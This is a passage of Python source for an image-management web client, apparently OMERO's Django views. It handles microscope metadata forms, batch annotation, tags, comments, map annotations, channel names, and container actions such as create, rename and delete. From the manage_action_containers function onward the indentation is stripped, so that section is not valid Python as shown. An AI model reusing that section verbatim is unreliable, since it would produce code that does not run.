            if image.getObjectiveSettings() is not None:
                # load the enums if needed and create our Objective Form
                if mediums is None:
                    mediums = list(conn.getEnumerationEntries("MediumI"))
                if immersions is None:
                    immersions = list(conn.getEnumerationEntries("ImmersionI"))
                if corrections is None:
                    corrections = list(conn.getEnumerationEntries("CorrectionI"))
                form_objective = MetadataObjectiveSettingsForm(
                    initial={
                        "objectiveSettings": image.getObjectiveSettings(),
                        "objective": image.getObjectiveSettings().getObjective(),
                        "mediums": mediums,
                        "immersions": immersions,
                        "corrections": corrections,
                    }
                )
            if image.getImagingEnvironment() is not None:
                form_environment = MetadataEnvironmentForm(initial={"image": image})
            if image.getStageLabel() is not None:
                form_stageLabel = MetadataStageLabelForm(initial={"image": image})
            instrument = image.getInstrument()
            if instrument is not None:
                if instrument.getMicroscope() is not None:
                    form_microscope = MetadataMicroscopeForm(
                        initial={
                            "microscopeTypes": list(
                                conn.getEnumerationEntries("MicroscopeTypeI")
                            ),
                            "microscope": instrument.getMicroscope(),
                        }
                    )
                objectives = instrument.getObjectives()
                for o in objectives:
                    # load the enums if needed and create our Objective Form
                    if mediums is None:
                        mediums = list(conn.getEnumerationEntries("MediumI"))
                    if immersions is None:
                        immersions = list(conn.getEnumerationEntries("ImmersionI"))
                    if corrections is None:
                        corrections = list(conn.getEnumerationEntries("CorrectionI"))
                    obj_form = MetadataObjectiveForm(
                        initial={
                            "objective": o,
                            "mediums": mediums,
                            "immersions": immersions,
                            "corrections": corrections,
                        },
                        auto_id=False,
                    )
                    form_instrument_objectives.append(obj_form)
                filters = list(instrument.getFilters())
                if len(filters) > 0:
                    for f in filters:
                        form_filter = MetadataFilterForm(
                            initial={
                                "filter": f,
                                "types": list(
                                    conn.getEnumerationEntries("FilterTypeI")
                                ),
                            },
                            auto_id=False,
                        )
                        form_filters.append(form_filter)
                dichroics = list(instrument.getDichroics())
                for d in dichroics:
                    form_dichroic = MetadataDichroicForm(
                        initial={"dichroic": d}, auto_id=False
                    )
                    form_dichroics.append(form_dichroic)
                detectors = list(instrument.getDetectors())
                if len(detectors) > 0:
                    for d in detectors:
                        form_detector = MetadataDetectorForm(
                            initial={
                                "detectorSettings": None,
                                "detector": d,
                                "types": list(
                                    conn.getEnumerationEntries("DetectorTypeI")
                                ),
                            },
                            auto_id=False,
                        )
                        form_detectors.append(form_detector)
                lasers = list(instrument.getLightSources())
                if len(lasers) > 0:
                    for laser in lasers:
                        lstypes = lasertypes
                        if laser.OMERO_CLASS == "Arc":
                            lstypes = arctypes
                        elif laser.OMERO_CLASS == "Filament":
                            lstypes = filamenttypes
                        form_laser = MetadataLightSourceForm(
                            initial={
                                "lightSource": laser,
                                "lstypes": lstypes,
                                "mediums": list(
                                    conn.getEnumerationEntries("LaserMediumI")
                                ),
                                "pulses": list(conn.getEnumerationEntries("PulseI")),
                            },
                            auto_id=False,
                        )
                        form_lasers.append(form_laser)
    # TODO: remove this 'if' since we should only have c_type = 'image'?
    context = {"manager": manager, "share_id": share_id}
    if c_type not in ("share", "discussion", "tag"):
        context["form_channels"] = form_channels
        context["form_environment"] = form_environment
        context["form_objective"] = form_objective
        context["form_microscope"] = form_microscope
        context["form_instrument_objectives"] = form_instrument_objectives
        context["form_filters"] = form_filters
        context["form_dichroics"] = form_dichroics
        context["form_detectors"] = form_detectors
        context["form_lasers"] = form_lasers
        context["form_stageLabel"] = form_stageLabel
    context["template"] = template
    return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None, **kwargs):
    """
    Load the 'Original Metadata' for the specified image.

    Returns a context dict containing the original/global/series metadata
    (as returned by image.loadOriginalMetadata()), or an HTTP 408 response
    if reading the metadata times out.
    """
    image = conn.getObject("Image", imageId)
    if image is None:
        raise Http404("No Image found with ID %s" % imageId)
    context = {
        "template": "webclient/annotations/original_metadata.html",
        "imageId": image.getId(),
    }
    try:
        om = image.loadOriginalMetadata()
        # om is (original, global, series) metadata - TODO confirm ordering
        if om is not None:
            context["original_metadata"] = om[0]
            context["global_metadata"] = om[1]
            context["series_metadata"] = om[2]
    except omero.LockTimeout:
        # 408 is Request Timeout
        return HttpResponse(content="LockTimeout", status=408)
    return context
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
    """
    Prepare objects for use in the annotation forms.
    These objects are required by the form superclass to populate hidden
    fields, so we know what we're annotating on submission
    """
    params = request.GET or request.POST

    def _fetch(obj_type, param_name):
        # Load the requested objects of one type, or an empty list
        obj_ids = params.getlist(param_name)
        if len(obj_ids) > 0:
            return list(conn.getObjects(obj_type, obj_ids))
        return list()

    share_ids = params.getlist("share")
    if len(share_ids) > 0:
        shares = [conn.getShare(share_ids[0])]
    else:
        shares = list()
    return {
        "image": _fetch("Image", "image"),
        "dataset": _fetch("Dataset", "dataset"),
        "project": _fetch("Project", "project"),
        "screen": _fetch("Screen", "screen"),
        "plate": _fetch("Plate", "plate"),
        "acquisition": _fetch("PlateAcquisition", "acquisition"),
        "well": _fetch("Well", "well"),
        "share": shares,
    }
def getIds(request):
    """
    Used by forms to indicate the currently selected objects prepared above
    """
    params = request.GET or request.POST
    # (result key, request parameter) pairs, in the order callers expect
    key_params = (
        ("images", "image"),
        ("datasets", "dataset"),
        ("projects", "project"),
        ("screens", "screen"),
        ("plates", "plate"),
        ("acquisitions", "acquisition"),
        ("wells", "well"),
        ("shares", "share"),
    )
    return {key: params.getlist(param) for key, param in key_params}
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
    """
    This page gives a form for batch annotation.
    Local File form and Comment form are loaded. Other forms are loaded via
    AJAX.

    Object IDs arrive as request parameters (?image=1&image=2...) and are
    resolved by getObjects(). Returns a context dict for render_response().
    """
    objs = getObjects(request, conn)
    # get groups for selected objects - setGroup() and create links
    obj_ids = []
    obj_labels = []
    groupIds = set()
    annotationBlocked = False
    for key in objs:
        obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
        for o in objs[key]:
            groupIds.add(o.getDetails().group.id.val)
            if not o.canAnnotate():
                annotationBlocked = (
                    "Can't add annotations because you don't" " have permissions"
                )
            obj_labels.append({"type": key.title(), "id": o.id, "name": o.getName()})
    obj_string = "&".join(obj_ids)
    link_string = "|".join(obj_ids).replace("=", "-")
    if len(groupIds) == 0:
        # No supported objects found.
        # If multiple tags / tagsets selected, return placeholder
        if (
            len(request.GET.getlist("tag")) > 0
            or len(request.GET.getlist("tagset")) > 0
        ):
            return HttpResponse("<h2>Can't batch annotate tags</h2>")
        else:
            return handlerInternalError(request, "No objects found")
    groupId = list(groupIds)[0]
    conn.SERVICE_OPTS.setOmeroGroup(groupId)
    manager = BaseContainer(conn)
    figScripts = manager.listFigureScripts(objs)
    canExportAsJpg = manager.canExportAsJpg(request, objs)
    filesetInfo = None
    iids = []
    if "image" in objs and len(objs["image"]) > 0:
        iids = [i.getId() for i in objs["image"]]
    if len(iids) > 0:
        filesetInfo = conn.getFilesetFilesInfo(iids)
        archivedInfo = conn.getArchivedFilesInfo(iids)
        filesetInfo["count"] += archivedInfo["count"]
        filesetInfo["size"] += archivedInfo["size"]
    context = {
        "iids": iids,
        "obj_string": obj_string,
        "link_string": link_string,
        "obj_labels": obj_labels,
        "batch_ann": True,
        "figScripts": figScripts,
        "canExportAsJpg": canExportAsJpg,
        "filesetInfo": filesetInfo,
        "annotationBlocked": annotationBlocked,
        "differentGroups": False,
    }
    if len(groupIds) > 1:
        context["annotationBlocked"] = (
            "Can't add annotations because" " objects are in different groups"
        )
        context["differentGroups"] = True  # E.g. don't run scripts etc
    context["canDownload"] = manager.canDownload(objs)
    context["template"] = "webclient/annotations/batch_annotate.html"
    context["webclient_path"] = reverse("webindex")
    # Reuse the objects loaded above rather than calling getObjects() a
    # second time, which re-ran every underlying query for no benefit.
    context["annotationCounts"] = manager.getBatchAnnotationCounts(objs)
    return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
    """
    On 'POST', This handles attaching an existing file-annotation(s) and/or
    upload of a new file to one or more objects
    Otherwise it generates the form for choosing file-annotations & local
    files.

    Object IDs arrive as request parameters and are resolved by
    getObjects()/getIds(). Raises Http404 if no objects are specified.
    """
    oids = getObjects(request, conn)
    selected = getIds(request)
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
    }
    # Use the first object we find to set context (assume all objects are in
    # same group!)
    for obs in oids.values():
        if len(obs) > 0:
            conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    obj_count = sum([len(selected[types]) for types in selected])
    if obj_count == 0:
        raise Http404("Need to specify objects via e.g. ?image=1")
    # Get appropriate manager, either to list available Files to add to single
    # object, or list ALL Files (multiple objects)
    manager = None
    if obj_count == 1:
        # Find the single selected object's type and id
        for t in selected:
            if len(selected[t]) > 0:
                o_type = t[:-1]  # "images" -> "image"
                o_id = selected[t][0]
                break
        if o_type in (
            "dataset",
            "project",
            "image",
            "screen",
            "plate",
            "acquisition",
            "well",
            "comment",
            "file",
            "tag",
            "tagset",
        ):
            if o_type == "tagset":
                # TODO: this should be handled by the BaseContainer
                o_type = "tag"
            kw = {}
            if o_type is not None and int(o_id) > 0:
                kw[str(o_type)] = int(o_id)
            try:
                manager = BaseContainer(conn, **kw)
            except AttributeError as x:
                return handlerInternalError(request, x)
    if manager is not None:
        # Single-object case: files linked to that object
        files = manager.getFilesByObject()
    else:
        manager = BaseContainer(conn)
        for dtype, objs in oids.items():
            if len(objs) > 0:
                # NB: we only support a single data-type now. E.g. 'image' OR
                # 'dataset' etc.
                files = manager.getFilesByObject(
                    parent_type=dtype, parent_ids=[o.getId() for o in objs]
                )
                break
    initial["files"] = files
    if request.method == "POST":
        # handle form submission
        form_file = FilesAnnotationForm(initial=initial, data=request.POST.copy())
        if form_file.is_valid():
            # Link existing files...
            files = form_file.cleaned_data["files"]
            added_files = []
            if files is not None and len(files) > 0:
                added_files = manager.createAnnotationsLinks("file", files, oids)
            # upload new file
            fileupload = (
                "annotation_file" in request.FILES
                and request.FILES["annotation_file"]
                or None
            )
            if fileupload is not None and fileupload != "":
                newFileId = manager.createFileAnnotations(fileupload, oids)
                added_files.append(newFileId)
            return JsonResponse({"fileIds": added_files})
        else:
            return HttpResponse(form_file.errors)
    else:
        # GET: render the unbound form
        form_file = FilesAnnotationForm(initial=initial)
    context = {"form_file": form_file}
    template = "webclient/annotations/files_form.html"
    context["template"] = template
    return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
    """
    Apply a Rating to one or more objects.

    Expects a POST with a "rating" parameter plus the usual object-id
    parameters resolved by getObjects().
    """
    if request.method != "POST":
        raise Http404("Only POST supported")
    score = getIntOrDefault(request, "rating", 0)
    # Set (or update) the rating on every selected object
    for obj_list in getObjects(request, conn).values():
        for obj in obj_list:
            obj.setRating(score)
    # return a summary of ratings
    return JsonResponse({"success": True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
    """Handle adding Comments to one or more objects
    Unbound instance of Comment form not available.
    If the form has been submitted, a bound instance of the form
    is created using request.POST"""
    if request.method != "POST":
        raise Http404("Unbound instance of form not available.")
    oids = getObjects(request, conn)
    selected = getIds(request)
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
        "shares": oids["share"],
    }
    # Use the first object we find to set context (assume all objects are in
    # same group!) this does not apply to share
    if len(oids["share"]) < 1:
        for obs in oids.values():
            if len(obs) > 0:
                conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    # Handle form submission...
    form_multi = CommentAnnotationForm(initial=initial, data=request.POST.copy())
    if form_multi.is_valid():
        # In each case below, we pass the {'object_type': [ids]} map
        content = form_multi.cleaned_data["comment"]
        if content is not None and content != "":
            if oids["share"] is not None and len(oids["share"]) > 0:
                # Commenting on a share: comment is added via the share manager
                sid = oids["share"][0].id
                manager = BaseShare(conn, sid)
                host = "%s?server=%i" % (
                    request.build_absolute_uri(
                        reverse("load_template", args=["public"])
                    ),
                    int(conn.server_id),
                )
                textAnn = manager.addComment(host, content)
                # For shares we need to return html for display...
                context = {
                    "tann": textAnn,
                    "added_by": conn.getUserId(),
                    "template": "webclient/annotations/comment.html",
                }
            else:
                # ...otherwise Comments are re-loaded by AJAX json
                # so we don't *need* to return anything
                manager = BaseContainer(conn)
                annId = manager.createCommentAnnotations(content, oids)
                context = {"annId": annId, "added_by": conn.getUserId()}
        return context
    else:
        # TODO: handle invalid form error
        return HttpResponse(str(form_multi.errors))
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
    """
    Handle adding Map Annotations to one or more objects
    POST data "mapAnnotation" should be list of ['key':'value'] pairs.

    POST "annId" values select existing annotations to update (or delete,
    when the new data is empty); otherwise new annotation(s) are created.
    POST "duplicate"="true" creates one annotation per object rather than
    a single shared annotation (always forced for the client namespace).
    """
    if request.method != "POST":
        raise Http404(
            "Need to POST map annotation data as list of" " ['key', 'value'] pairs"
        )
    oids = getObjects(request, conn)
    # Use the first object we find to set context (assume all objects are in
    # same group!)
    # this does not apply to share
    if len(oids["share"]) < 1:
        for obs in oids.values():
            if len(obs) > 0:
                conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    data = request.POST.get("mapAnnotation")
    data = json.loads(data)
    annIds = request.POST.getlist("annId")
    ns = request.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
    # Create a new annotation
    if len(annIds) == 0 and len(data) > 0:
        # BUG FIX: the comparison result was previously discarded
        # (`duplicate.lower() == "true"` as a bare statement), leaving
        # `duplicate` a non-empty - hence always truthy - string, so the
        # single-shared-annotation branch below was unreachable.
        duplicate = request.POST.get("duplicate", "false").lower() == "true"
        # For 'client' map annotations, we enforce 1 annotation per object
        if ns == omero.constants.metadata.NSCLIENTMAPANNOTATION:
            duplicate = True
        if duplicate:
            # Create a new Map Annotation for each object:
            for k, objs in oids.items():
                for obj in objs:
                    ann = omero.gateway.MapAnnotationWrapper(conn)
                    ann.setValue(data)
                    ann.setNs(ns)
                    ann.save()
                    annIds.append(ann.getId())
                    obj.linkAnnotation(ann)
        else:
            # Create single Map Annotation and link to all objects
            ann = omero.gateway.MapAnnotationWrapper(conn)
            ann.setValue(data)
            ann.setNs(ns)
            ann.save()
            annIds.append(ann.getId())
            for k, objs in oids.items():
                for obj in objs:
                    obj.linkAnnotation(ann)
    # Or update existing annotations
    else:
        for annId in annIds:
            ann = conn.getObject("MapAnnotation", annId)
            if ann is None:
                continue
            if len(data) > 0:
                ann.setValue(data)
                ann.save()
            else:
                # Delete if no data
                handle = conn.deleteObjects("/Annotation", [annId])
                try:
                    conn._waitOnCmd(handle)
                finally:
                    handle.close()
        if len(data) == 0:
            annIds = None
    return {"annId": annIds}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
    """
    Provide JSON data for ome.tagging_form.js.

    The "jsonmode" GET parameter selects the payload: "tagcount",
    "tags", "desc" or "owners".
    """
    group_id = get_long_or_default(request, "group", -1)
    conn.SERVICE_OPTS.setOmeroGroup(str(group_id))
    try:
        offset = int(request.GET.get("offset"))
        limit = int(request.GET.get("limit", 1000))
    except Exception:
        # Missing/invalid paging parameters: load without paging
        offset = limit = None
    jsonmode = request.GET.get("jsonmode")
    if jsonmode == "tagcount":
        return {"tag_count": conn.getTagCount()}
    manager = BaseContainer(conn)
    manager.loadTagsRecursive(eid=-1, offset=offset, limit=limit)
    all_tags = manager.tags_recursive
    all_tags_owners = manager.tags_recursive_owners
    if jsonmode == "tags":
        # Tag information without the descriptions
        return [(i, t, o, s) for i, d, t, o, s in all_tags]
    if jsonmode == "desc":
        # Descriptions keyed by tag id
        return {i: d for i, d, t, o, s in all_tags}
    if jsonmode == "owners":
        return all_tags_owners
    return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
    """
    This handles creation AND submission of Tags form, adding new AND/OR
    existing tags to one or more objects

    GET renders the tagging form; POST links/unlinks existing tags and
    creates any new tags submitted via the "newtags" formset.
    """
    oids = getObjects(request, conn)
    selected = getIds(request)
    obj_count = sum([len(selected[types]) for types in selected])
    # Get appropriate manager, either to list available Tags to add to single
    # object, or list ALL Tags (multiple objects)
    manager = None
    self_id = conn.getEventContext().userId
    tags = []
    # Use the first object we find to set context (assume all objects are
    # in same group!)
    for obs in oids.values():
        if len(obs) > 0:
            conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    # Make a list of all current tags
    # As would be on right column of tagging dialog...
    taglist, users = tree.marshal_annotations(
        conn,
        project_ids=selected["projects"],
        dataset_ids=selected["datasets"],
        image_ids=selected["images"],
        screen_ids=selected["screens"],
        plate_ids=selected["plates"],
        run_ids=selected["acquisitions"],
        well_ids=selected["wells"],
        ann_type="tag",
        # If we reach this limit we'll get some tags not removed
        limit=ANNOTATIONS_LIMIT,
    )
    # Map experimenter id -> experimenter info, for owner names below
    userMap = {}
    for exp in users:
        userMap[exp["id"]] = exp
    # For batch annotate, only include tags that user has added to all objects
    if obj_count > 1:
        # count my links
        myLinkCount = {}
        for t in taglist:
            tid = t["id"]
            if tid not in myLinkCount:
                myLinkCount[tid] = 0
            if t["link"]["owner"]["id"] == self_id:
                myLinkCount[tid] += 1
        # filter
        taglist = [t for t in taglist if myLinkCount[t["id"]] == obj_count]
    selected_tags = []
    for tag in taglist:
        linkOwnerId = tag["link"]["owner"]["id"]
        owner = userMap[linkOwnerId]
        ownerName = "%s %s" % (owner["firstName"], owner["lastName"])
        canDelete = True
        created = tag["link"]["date"]
        linkOwned = linkOwnerId == self_id
        selected_tags.append(
            (tag["id"], self_id, ownerName, canDelete, created, linkOwned)
        )
    # selected_tags is really a list of tag LINKS.
    # May be several links per tag.id
    selected_tags.sort(key=lambda x: x[0])
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
    }
    if request.method == "POST":
        # handle form submission
        form_tags = TagsAnnotationForm(initial=initial, data=request.POST.copy())
        newtags_formset = NewTagsAnnotationFormSet(
            prefix="newtags", data=request.POST.copy()
        )
        # Create new tags or Link existing tags...
        if form_tags.is_valid() and newtags_formset.is_valid():
            # filter down previously selected tags to the ones linked by
            # current user
            selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
            # Remove duplicates from tag IDs
            selected_tag_ids = list(set(selected_tag_ids))
            post_tags = list(form_tags.cleaned_data["tags"])
            # Tags newly checked in the form vs tags the user un-checked
            tags = [tag for tag in post_tags if tag not in selected_tag_ids]
            removed = [tag for tag in selected_tag_ids if tag not in post_tags]
            manager = BaseContainer(conn)
            if tags:
                manager.createAnnotationsLinks("tag", tags, oids)
            new_tags = []
            for form in newtags_formset.forms:
                new_tags.append(
                    manager.createTagAnnotations(
                        form.cleaned_data["tag"],
                        form.cleaned_data["description"],
                        oids,
                        tag_group_id=form.cleaned_data["tagset"],
                    )
                )
            # only remove Tags where the link is owned by self_id
            for remove in removed:
                tag_manager = BaseContainer(conn, tag=remove)
                tag_manager.remove(
                    [
                        "%s-%s" % (dtype, obj.id)
                        for dtype, objs in oids.items()
                        for obj in objs
                    ],
                    tag_owner_id=self_id,
                )
            return JsonResponse({"added": tags, "removed": removed, "new": new_tags})
        else:
            # TODO: handle invalid form error
            return HttpResponse(str(form_tags.errors))
    else:
        # GET: render unbound forms
        form_tags = TagsAnnotationForm(initial=initial)
        newtags_formset = NewTagsAnnotationFormSet(prefix="newtags")
    context = {
        "form_tags": form_tags,
        "newtags_formset": newtags_formset,
        "selected_tags": selected_tags,
    }
    template = "webclient/annotations/tags_form.html"
    context["template"] = template
    return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
    """
    Edit and save channel names.

    POST parameters "channel0", "channel1"... supply the new names.
    If "confirm_apply" is present, the names are applied to the parent
    container identified by "parentId" (e.g. "dataset-123" or "plate-45");
    otherwise they are applied to this image only.

    Returns a dict with the saved names and update counts, or an "error"
    entry when no parent could be found.
    """
    image = conn.getObject("Image", imageId)
    sizeC = image.getSizeC()
    channelNames = {}
    nameDict = {}
    for i in range(sizeC):
        cname = request.POST.get("channel%d" % i, None)
        if cname is not None:
            cname = smart_str(cname)[:255]  # Truncate to fit in DB
            channelNames["channel%d" % i] = cname
            nameDict[i + 1] = cname
    # BUG FIX: 'counts' was previously unbound, raising NameError below,
    # when 'confirm_apply' was posted without a 'parentId'. Initialising it
    # to None routes that case to the "No parent found" error response.
    counts = None
    # If the 'Apply to Dataset' button was used to submit...
    if request.POST.get("confirm_apply", None) is not None:
        # plate-123 OR dataset-234
        parentId = request.POST.get("parentId", None)
        if parentId is not None:
            ptype = parentId.split("-")[0].title()
            pid = long(parentId.split("-")[1])
            counts = conn.setChannelNames(ptype, [pid], nameDict, channelCount=sizeC)
    else:
        counts = conn.setChannelNames("Image", [image.getId()], nameDict)
    rv = {"channelNames": channelNames}
    if counts:
        rv["imageCount"] = counts["imageCount"]
        rv["updateCount"] = counts["updateCount"]
        return rv
    else:
        return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(
request, action, o_type=None, o_id=None, conn=None, **kwargs
):
"""
Handles many different actions on various objects.
@param action: "addnewcontainer", (creates a new Project, Dataset,
Screen), "editname", "savename", "editdescription",
"savedescription", (used as GET and POST for in-line
editing),
"removefromshare", (tree P/D/I moving etc)
"delete", "deletemany" (delete objects)
"remove" (remove tag/comment from object)
@param o_type: "dataset", "project", "image", "screen", "plate",
"acquisition", "well","comment", "file", "tag",
"tagset","share", "sharecomment"
"""
template = None
manager = None
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
kw = {}
if o_type is not None and int(o_id) > 0:
o_id = int(o_id)
kw[str(o_type)] = o_id
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
elif o_type in ("share", "sharecomment", "chat"):
manager = BaseShare(conn, o_id)
else:
manager = BaseContainer(conn)
form = None
if action == "addnewcontainer":
# Used within the jsTree to add a new Project, Dataset, Tag,
# Tagset etc under a specified parent OR top-level
if not request.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, status=405
)
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Create new in %s: %s" % (o_type, str(form.cleaned_data)))
name = form.cleaned_data["name"]
description = form.cleaned_data["description"]
owner = form.cleaned_data["owner"]
if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
oid = manager.createDataset(name, description, owner=owner)
elif o_type == "tagset" and o_id > 0:
oid = manager.createTag(name, description, owner=owner)
elif request.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
# No parent specified. We can create orphaned 'project',
# 'dataset' etc.
folder_type = request.POST.get("folder_type")
if folder_type == "dataset":
oid = manager.createDataset(
name,
description,
owner=owner,
img_ids=request.POST.getlist("image", None),
)
else:
oid = conn.createContainer(
folder_type, name, description, owner=owner
)
else:
return HttpResponseServerError("Object does not exist")
rdict = {"bad": "false", "id": oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
elif action == "edit":
# form for editing Shares only
if o_id is None:
raise Http404("No share ID")
if o_type == "share" and int(o_id) > 0:
template = "webclient/public/share_form.html"
manager.getMembers(o_id)
manager.getComments(o_id)
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
initial = {
"message": manager.share.message,
"expiration": "",
"shareMembers": manager.membersInShare,
"enable": manager.share.active,
"experimenters": experimenters,
}
if manager.share.getExpireDate() is not None:
initial["expiration"] = manager.share.getExpireDate().strftime(
"%Y-%m-%d"
)
form = ShareForm(initial=initial) # 'guests':share.guestsInShare,
context = {"manager": manager, "form": form}
elif action == "save":
# Handles submission of the 'edit' form above. TODO: not used now?
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if o_type == "share":
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
form = ShareForm(
initial={"experimenters": experimenters}, data=request.POST.copy()
)
if form.is_valid():
logger.debug("Update share: %s" % (str(form.cleaned_data)))
message = form.cleaned_data["message"]
expiration = form.cleaned_data["expiration"]
members = form.cleaned_data["members"]
# guests = request.POST['guests']
enable = form.cleaned_data["enable"]
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
manager.updateShareOrDiscussion(
host, message, members, enable, expiration
)
r = "enable" if enable else "disable"
return HttpResponse(r)
else:
template = "webclient/public/share_form.html"
context = {"share": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "editname":
# start editing 'name' in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
if o_type == "tag":
txtValue = obj.textValue
else:
txtValue = obj.getName()
form = ContainerNameForm(initial={"name": txtValue})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savename":
# Save name edit in-line
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerNameForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
name = form.cleaned_data["name"]
rdict = {"bad": "false", "o_type": o_type}
manager.updateName(o_type, name)
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "editdescription":
# start editing description in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
form = ContainerDescriptionForm(initial={"description": obj.description})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savedescription":
# Save editing of description in-line
if not request.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (action, o_type, o_id)
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerDescriptionForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
description = form.cleaned_data["description"]
manager.updateDescription(o_type, description)
rdict = {"bad": "false"}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "remove":
# Handles removal of comment, tag from
# Object etc.
# E.g. image-123 or image-1|image-2
parents = request.POST["parent"]
try:
manager.remove(parents.split("|"))
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "removefromshare":
image_id = request.POST.get("source")
try:
manager.removeImage(image_id)
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "delete":
# Handles delete of a file attached to object.
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
try:
handle = manager.deleteItem(child, anns)
request.session["callback"][str(handle)] = {
"job_type": "delete",
"delmany": False,
"did": o_id,
"dtype": o_type,
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"start_time": datetime.datetime.now(),
}
request.session.modified = True
except Exception as x:
logger.error(
"Failed to delete: %r" % {"did": o_id, "dtype": o_type}, exc_info=True
)
rdict = {"bad": "true", "errs": str(x)}
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "deletemany":
# Handles multi-delete from jsTree.
object_ids = {
"Image": request.POST.getlist("image"),
"Dataset": request.POST.getlist("dataset"),
"Project": request.POST.getlist("project"),
"Annotation": request.POST.getlist("tag"),
"Screen": request.POST.getlist("screen"),
"Plate": request.POST.getlist("plate"),
"Well": request.POST.getlist("well"),
"PlateAcquisition": request.POST.getlist("acquisition"),
}
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
logger.debug(
"Delete many: child? %s anns? %s object_ids %s" % (child, anns, object_ids)
)
try:
for key, ids in object_ids.items():
if ids is not None and len(ids) > 0:
handle = manager.deleteObjects(key, ids, child, anns)
if key == "PlateAcquisition":
key = "Plate Run" # for nicer user message
dMap = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"dtype": key,
}
if len(ids) > 1:
dMap["delmany"] = len(ids)
dMap["did"] = ids
else:
dMap["delmany"] = False
dMap["did"] = ids[0]
request.session["callback"][str(handle)] = dMap
request.session.modified = True
except Exception:
logger.error(
